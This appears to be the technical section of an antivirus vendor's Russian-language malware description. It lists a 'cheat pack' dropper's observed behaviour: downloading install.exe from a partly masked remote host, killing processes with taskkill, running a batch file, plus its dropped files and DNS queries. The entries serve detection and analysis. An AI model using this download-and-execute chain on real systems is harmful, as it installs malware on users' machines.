Техническая информация
- '%TEMP%\install.exe'
- '<Текущая директория>\library.exe' -P %HOMEPATH%\Local Settings\Temp http://cs###ader.vv.si/install.exe
- '%TEMP%\install.exe' (загружен из сети Интернет)
- '<SYSTEM32>\taskkill.exe' /f /im library.exe
- '<SYSTEM32>\taskkill.exe' /f /im cheat_pack.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\cheat_pack.cmd" "
- '<SYSTEM32>\ping.exe' ya.ru -n 5
- %TEMP%\install.exe
- <Текущая директория>\library.exe
- %TEMP%\1.tmp\cheat_pack.cmd
- %TEMP%\1.tmp\cheat_pack.cmd
- <Текущая директория>\library.exe
- 'cs###ader.vv.si':80
- cs###ader.vv.si/install.exe
- DNS ASK cs###ader.vv.si
- DNS ASK ya.ru
- ClassName: '' WindowName: ''